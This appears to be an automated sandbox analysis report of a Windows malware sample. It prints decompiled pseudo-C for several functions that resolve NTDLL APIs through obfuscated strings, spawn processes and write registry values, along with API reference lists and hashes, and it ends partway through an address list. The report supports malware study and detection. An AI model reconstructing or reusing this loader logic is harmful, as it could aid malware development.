                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: c64c0e2c283a8dfa3813759221b11c6a33b6c284dd20dabb713edeb1d1aa12ae
                                                          • Instruction ID: cf6c8424c7ae7c695ac0c5869ea077298665b08f7604a02d255ca13460200fe7
                                                          • Opcode Fuzzy Hash: c64c0e2c283a8dfa3813759221b11c6a33b6c284dd20dabb713edeb1d1aa12ae
                                                          • Instruction Fuzzy Hash: 8B61F531D80202AFCB11EB65EE48F56BBE9EB48380F054925FA44D7260D735E825DF75
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B96C38, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 27%
                                                          			E02B96C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x2b9d33c; // 0x69b9798
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E02B9A557(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x2b9c18c;
				}
				_t46 = E02B918A5(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E02B9A71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x2b9d2a8; // 0x3e1a5a8
						_t16 = _t75 + 0x2b9eb08; // 0x530025
						 *0x2b9d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E02B9A557(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x2b9c190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E02B9A71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E02B9A734(_v20);
						} else {
							_t66 =  *0x2b9d2a8; // 0x3e1a5a8
							_t31 = _t66 + 0x2b9ec28; // 0x73006d
							 *0x2b9d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E02B9A734(_v12);
				}
				return _v24;
			}




























                                                          0x02b96c40
                                                          0x02b96c46
                                                          0x02b96c4d
                                                          0x02b96c53
                                                          0x02b96c57
                                                          0x02b96c5b
                                                          0x02b96c5e
                                                          0x02b96c63
                                                          0x02b96c68
                                                          0x02b96c6a
                                                          0x02b96c6a
                                                          0x02b96c73
                                                          0x02b96c78
                                                          0x02b96c7d
                                                          0x02b96c83
                                                          0x02b96c8d
                                                          0x02b96c96
                                                          0x02b96c9d
                                                          0x02b96cb6
                                                          0x02b96cbb
                                                          0x02b96cc0
                                                          0x02b96cc9
                                                          0x02b96cd2
                                                          0x02b96ce3
                                                          0x02b96cec
                                                          0x02b96cf0
                                                          0x02b96cf4
                                                          0x02b96cf9
                                                          0x02b96cfe
                                                          0x02b96d00
                                                          0x02b96d00
                                                          0x02b96d0a
                                                          0x02b96d13
                                                          0x02b96d1a
                                                          0x02b96d32
                                                          0x02b96d36
                                                          0x02b96d73
                                                          0x02b96d38
                                                          0x02b96d3b
                                                          0x02b96d43
                                                          0x02b96d54
                                                          0x02b96d60
                                                          0x02b96d68
                                                          0x02b96d6c
                                                          0x02b96d6c
                                                          0x02b96d36
                                                          0x02b96d7b
                                                          0x02b96d80
                                                          0x02b96d87

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 02B96C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 02B96C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 02B96C96
                                                          • lstrlen.KERNEL32(00000000), ref: 02B96C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 02B96CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 02B96D0A
                                                          • lstrlen.KERNEL32(?), ref: 02B96D13
                                                          • lstrlen.KERNEL32(?), ref: 02B96D1A
                                                          • lstrlenW.KERNEL32(?), ref: 02B96D21
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          • Opcode ID: dbe2539418c366c0563884d0506908150b3c9af9ddb06ac994683d7260f55e41
                                                          • Instruction ID: 0e5d0a6d7f212bdbdb473acfc989710c48e76a331d09e984eb33ae9300cb4823
                                                          • Opcode Fuzzy Hash: dbe2539418c366c0563884d0506908150b3c9af9ddb06ac994683d7260f55e41
                                                          • Instruction Fuzzy Hash: 02415B76D00219FBCF11AFA9CD4899EBBB5EF48358F0544A1E904A7221DB35DA60EF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B98EA1, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E02B98EA1(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E02B9592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E02B9A749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x2b9d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x2b9d2a8; // 0x3e1a5a8
					_t18 = _t47 + 0x2b9e3e6; // 0x73797325
					_t68 = E02B93C48(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x2b9d2a8; // 0x3e1a5a8
						_t19 = _t50 + 0x2b9e747; // 0x69b8cef
						_t20 = _t50 + 0x2b9e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E02B9A62D();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E02B9A62D();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x2b9d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E02B9A734(_t70);
				goto L12;
			}


















                                                          0x02b98ea9
                                                          0x02b98ea9
                                                          0x02b98eb8
                                                          0x02b98ebf
                                                          0x02b98ec4
                                                          0x02b98fd1
                                                          0x02b98fd8
                                                          0x02b98fd8
                                                          0x02b98ed3
                                                          0x02b98edb
                                                          0x02b98ede
                                                          0x02b98ee3
                                                          0x02b98ef8
                                                          0x02b98efe
                                                          0x02b98eff
                                                          0x02b98f02
                                                          0x02b98f08
                                                          0x02b98f0b
                                                          0x02b98f10
                                                          0x02b98f18
                                                          0x02b98f24
                                                          0x02b98f28
                                                          0x02b98fb8
                                                          0x02b98f2e
                                                          0x02b98f2e
                                                          0x02b98f33
                                                          0x02b98f3a
                                                          0x02b98f4e
                                                          0x02b98f52
                                                          0x02b98fa1
                                                          0x02b98f54
                                                          0x02b98f55
                                                          0x02b98f5c
                                                          0x02b98f75
                                                          0x02b98f77
                                                          0x02b98f7b
                                                          0x02b98f82
                                                          0x02b98f9c
                                                          0x02b98f84
                                                          0x02b98f8d
                                                          0x02b98f92
                                                          0x02b98f92
                                                          0x02b98f82
                                                          0x02b98fb0
                                                          0x02b98fb0
                                                          0x02b98f28
                                                          0x02b98fbf
                                                          0x02b98fc8
                                                          0x02b98fcc
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 02B9592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02B98EBD,?,00000001,?,?,00000000,00000000), ref: 02B95952
                                                            • Part of subcall function 02B9592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02B95974
                                                            • Part of subcall function 02B9592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02B9598A
                                                            • Part of subcall function 02B9592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02B959A0
                                                            • Part of subcall function 02B9592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02B959B6
                                                            • Part of subcall function 02B9592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02B959CC
                                                          • memset.NTDLL ref: 02B98F0B
                                                            • Part of subcall function 02B93C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02B98F24,73797325), ref: 02B93C59
                                                            • Part of subcall function 02B93C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02B93C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,069B8CEF,73797325), ref: 02B98F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02B98F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 02B98FB0
                                                            • Part of subcall function 02B9A62D: GetProcAddress.KERNEL32(36776F57,02B9A2D4), ref: 02B9A648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 02B98F8D
                                                          • CloseHandle.KERNEL32(?), ref: 02B98F92
                                                          • GetLastError.KERNEL32(00000001), ref: 02B98F96
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 3075724336-0
                                                          • Opcode ID: d83d25fa7924c7157317344c20793aee486d9c59c21b13f29f97d8005f8e6775
                                                          • Instruction ID: 131712860ac178efd78e21d52d86e15a2f3ce9d00832931cabef8e1d73345429
                                                          • Opcode Fuzzy Hash: d83d25fa7924c7157317344c20793aee486d9c59c21b13f29f97d8005f8e6775
                                                          • Instruction Fuzzy Hash: 23313EB2C00209BFDF11AFA4DD88E9EBBBDEB09344F0148A6E605A7110D7359A54CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B91BB6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 63%
                                                          			E02B91BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x2b9d2a8; // 0x3e1a5a8
				_t1 = _t9 + 0x2b9e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E02B9173D(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E02B9A71F(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E02B964EF(_t34, _t41, _a8);
						E02B9A734(_t41);
						_t42 = E02B96467(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02B9A734(_t36);
							_t36 = _t42;
						}
						_t43 = E02B917E5(_t36, _t33);
						if(_t43 != 0) {
							E02B9A734(_t36);
							_t36 = _t43;
						}
					}
					E02B9A734(_t28);
				}
				return _t36;
			}














                                                          0x02b91bb6
                                                          0x02b91bb9
                                                          0x02b91bba
                                                          0x02b91bc2
                                                          0x02b91bc9
                                                          0x02b91bd0
                                                          0x02b91bd4
                                                          0x02b91bda
                                                          0x02b91be1
                                                          0x02b91be6
                                                          0x02b91bf8
                                                          0x02b91bfc
                                                          0x02b91c00
                                                          0x02b91c06
                                                          0x02b91c0b
                                                          0x02b91c1b
                                                          0x02b91c1d
                                                          0x02b91c34
                                                          0x02b91c38
                                                          0x02b91c3b
                                                          0x02b91c40
                                                          0x02b91c40
                                                          0x02b91c49
                                                          0x02b91c4d
                                                          0x02b91c50
                                                          0x02b91c55
                                                          0x02b91c55
                                                          0x02b91c4d
                                                          0x02b91c58
                                                          0x02b91c58
                                                          0x02b91c63

                                                          APIs
                                                            • Part of subcall function 02B9173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,02B91BD0,253D7325,00000000,00000000,7742C740,?,?,02B920C2,?), ref: 02B917A4
                                                            • Part of subcall function 02B9173D: sprintf.NTDLL ref: 02B917C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,02B920C2,?,069B95B0), ref: 02B91BE1
                                                          • lstrlen.KERNEL32(?,?,?,02B920C2,?,069B95B0), ref: 02B91BE9
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • strcpy.NTDLL ref: 02B91C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 02B91C0B
                                                            • Part of subcall function 02B964EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02B91C1A,00000000,?,?,?,02B920C2,?,069B95B0), ref: 02B96506
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02B920C2,?,069B95B0), ref: 02B91C28
                                                            • Part of subcall function 02B96467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02B91C34,00000000,?,?,02B920C2,?,069B95B0), ref: 02B96471
                                                            • Part of subcall function 02B96467: _snprintf.NTDLL ref: 02B964CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 783a0a94fded26eb17fbfbcb7b78fec68dfa789a692855d03639a6bce193d54a
                                                          • Instruction ID: 4b647e3cb37f3bb9dba239d85c1aa3e38b75e3f2a81c894d092dea0e485dd959
                                                          • Opcode Fuzzy Hash: 783a0a94fded26eb17fbfbcb7b78fec68dfa789a692855d03639a6bce193d54a
                                                          • Instruction Fuzzy Hash: 9511C677A01226774F12BBB89C45C6E3BBE9F4975430641B6F5049B200DF39CD02ABA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B96891, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 02B968EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 02B968FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 02B96911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B96979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B96988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B96993
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 7d762e1e84a33e940e22534107d49a00409b07bb525f06ed12939e18ab08c42e
                                                          • Instruction ID: 5ff12cf64f4245e80fd0e0cff33e14f55a21e6b888026ad872431b73cd45685a
                                                          • Opcode Fuzzy Hash: 7d762e1e84a33e940e22534107d49a00409b07bb525f06ed12939e18ab08c42e
                                                          • Instruction Fuzzy Hash: 94415E36D00609AFDF01DFB8D944A9EBBBAEF49304F144466EA14EB260DB71D905CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B9592D, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E02B9592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E02B9A71F(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x2b9d2a8; // 0x3e1a5a8
					_t1 = _t23 + 0x2b9e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x2b9d2a8; // 0x3e1a5a8
					_t2 = _t26 + 0x2b9e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02B9A734(_t54);
					} else {
						_t30 =  *0x2b9d2a8; // 0x3e1a5a8
						_t5 = _t30 + 0x2b9e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x2b9d2a8; // 0x3e1a5a8
							_t7 = _t33 + 0x2b9e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x2b9d2a8; // 0x3e1a5a8
								_t9 = _t36 + 0x2b9e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x2b9d2a8; // 0x3e1a5a8
									_t11 = _t39 + 0x2b9e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02B96604(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                          0x02b9593c
                                                          0x02b95940
                                                          0x02b95a02
                                                          0x02b95946
                                                          0x02b95946
                                                          0x02b9594b
                                                          0x02b9595e
                                                          0x02b95960
                                                          0x02b95965
                                                          0x02b9596d
                                                          0x02b95974
                                                          0x02b95976
                                                          0x02b9597b
                                                          0x02b959fa
                                                          0x02b959fb
                                                          0x02b9597d
                                                          0x02b9597d
                                                          0x02b95982
                                                          0x02b9598a
                                                          0x02b9598c
                                                          0x02b95991
                                                          0x00000000
                                                          0x02b95993
                                                          0x02b95993
                                                          0x02b95998
                                                          0x02b959a0
                                                          0x02b959a2
                                                          0x02b959a7
                                                          0x00000000
                                                          0x02b959a9
                                                          0x02b959a9
                                                          0x02b959ae
                                                          0x02b959b6
                                                          0x02b959b8
                                                          0x02b959bd
                                                          0x00000000
                                                          0x02b959bf
                                                          0x02b959bf
                                                          0x02b959c4
                                                          0x02b959cc
                                                          0x02b959ce
                                                          0x02b959d3
                                                          0x00000000
                                                          0x02b959d5
                                                          0x02b959db
                                                          0x02b959e0
                                                          0x02b959e7
                                                          0x02b959ec
                                                          0x02b959f1
                                                          0x00000000
                                                          0x02b959f3
                                                          0x02b959f6
                                                          0x02b959f6
                                                          0x02b959f1
                                                          0x02b959d3
                                                          0x02b959bd
                                                          0x02b959a7
                                                          0x02b95991
                                                          0x02b9597b
                                                          0x02b95a10

                                                          APIs
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02B98EBD,?,00000001,?,?,00000000,00000000), ref: 02B95952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 02B95974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 02B9598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02B959A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02B959B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02B959CC
                                                            • Part of subcall function 02B96604: memset.NTDLL ref: 02B96683
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: 6622b8ef0acb40eff28390fdf6bfdc659e5f2b9ddf6c22f1d34843fb3558be49
                                                          • Instruction ID: f44b499ae11c3a7656262461294ca6e1be45e7a598c2d56c001f54752b9dc6e0
                                                          • Opcode Fuzzy Hash: 6622b8ef0acb40eff28390fdf6bfdc659e5f2b9ddf6c22f1d34843fb3558be49
                                                          • Instruction Fuzzy Hash: D5219FB064020AAFDB21EFAACD84D5AB7ECEF053447424576EA45C7220E734EA058F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B9853F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E02B9853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x2b9d33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E02B99070( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E02B96E98(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E02B9A734(_a8);
						goto L29;
					}
					_t64 =  *0x2b9d278; // 0x69b9a98
					_t16 = _t64 + 0xc; // 0x69b9b66
					_t65 = E02B99070(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d02b9c0
						if(E02B922F1(_t97,  *_t33, _t91, _a8,  *0x2b9d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x2b9d2a8; // 0x3e1a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x2b9ea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x2b9e8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E02B96C38(_t69,  *0x2b9d334,  *0x2b9d338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x2b9d2a8; // 0x3e1a5a8
									_t44 = _t71 + 0x2b9e846; // 0x74666f53
									_t73 = E02B99070(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d02b9c0
										E02B95D7D( *_t47, _t91, _a8,  *0x2b9d338, _a24);
										_t49 = _t101 + 0x10; // 0x3d02b9c0
										E02B95D7D( *_t49, _t91, _t99,  *0x2b9d330, _a16);
										E02B9A734(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d02b9c0
									E02B95D7D( *_t40, _t91, _a8,  *0x2b9d338, _a24);
									_t43 = _t101 + 0x10; // 0x3d02b9c0
									E02B95D7D( *_t43, _t91, _a8,  *0x2b9d330, _a16);
								}
								if( *_t101 != 0) {
									E02B9A734(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d02b9c0
					_t81 = E02B98BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d02b9c0
							E02B922F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E02B9A734(_t100);
						_t98 = _a16;
					}
					E02B9A734(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E02B9A749(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x2b9d33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                          0x02b9853f
                                                          0x02b98548
                                                          0x02b9854f
                                                          0x02b98554
                                                          0x02b985c1
                                                          0x02b985c7
                                                          0x02b985cc
                                                          0x02b985d3
                                                          0x02b985d8
                                                          0x02b985dd
                                                          0x02b98748
                                                          0x02b9874f
                                                          0x02b9874f
                                                          0x02b98754
                                                          0x02b98756
                                                          0x02b98756
                                                          0x02b9875f
                                                          0x02b9875f
                                                          0x02b985e3
                                                          0x02b985ef
                                                          0x02b9873e
                                                          0x02b98741
                                                          0x00000000
                                                          0x02b98741
                                                          0x02b985f5
                                                          0x02b985fa
                                                          0x02b985fd
                                                          0x02b98602
                                                          0x02b98607
                                                          0x02b98650
                                                          0x02b98650
